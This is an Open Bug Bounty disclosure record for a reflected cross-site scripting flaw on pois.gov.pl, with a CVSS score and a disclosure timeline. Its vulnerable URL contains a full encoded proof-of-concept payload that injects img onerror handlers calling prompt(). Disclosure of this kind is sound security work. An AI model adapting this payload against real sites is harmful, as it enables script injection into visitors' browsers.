pois.gov.pl XSS vulnerability

2017-11-07T04:50:00
ID OBB:397816
Type openbugbounty
Reporter OmniGooch
Modified 2018-02-05T04:50:00

Description

Open Bug Bounty ID: OBB-397816

Description| Value
---|---
Affected Website:| pois.gov.pl
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.pois.gov.pl/strony/szukaj/?param=%3c%2fscript%3e%3cimg+src%3dx+onerror%3dprompt(%2fXSSPOSED%2f)%3e%2522%253E%253C%2fscript%253E%253Cimg%2520src%3dhttp%3a%2f%2fi.dailymail.co.uk%2fi%2fpix%2f2016%2f08%2f11%2f17%2f371D509C00000578-3734919-Speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea-a-15_1470931763257.jpg%2520onerror%3dprompt(%2fXSSPOSED%2f)%253E#/param=%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%2FXSSPOSED%2F)%3E%2522%253E%253C%2Fscript%253E%253Cimg%2520src%3Dhttp%3A%2F%2Fi.dailymail.co.uk%2Fi%2Fpix%2F2016%2F08%2F11%2F17%2F371D509C00000578-3734919-Speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea-a-15_1470931763257.jpg%2520onerror%3Dprompt(%2FXSSPOSED%2F)%253E/rodzaj=0/domyslne=1
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 7 November, 2017 04:50 GMT
Vulnerability Verified:| 7 November, 2017 07:27 GMT
Website Operator Notified:| 7 November, 2017 07:27 GMT
Vulnerability Published:| 7 November, 2017 07:27 GMT[without any technical details]
Public Disclosure:| 5 February, 2018 04:50 GMT